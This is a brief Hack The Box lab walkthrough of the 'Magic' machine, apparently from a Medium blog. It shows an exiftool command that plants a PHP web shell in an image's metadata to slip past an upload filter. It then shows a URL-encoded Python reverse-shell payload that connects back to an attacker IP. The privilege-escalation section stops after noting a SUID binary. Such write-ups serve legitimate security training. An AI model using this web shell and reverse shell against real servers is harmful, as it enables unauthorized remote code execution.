Magic — HTB walkthrough

ENUMERATE

Nmap scan

aggressive scan for versions with default scripts
visiting website
#exiftool -Comment=’<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ exploit.png#cp exploit.png exploit.php.png
We get uploads.

EXPLOITATION

We will access the image and get a reverse shell using cmd parameter we added in our payload.

http://10.10.10.185/images/uploads/exploit.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.16%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
getting user.txt

PRIVILEGE ESCALATION

Enumerating we see user theseus, have suid priv on /usr/bin/sysinfo

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Dhanishtha Awasthi

Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.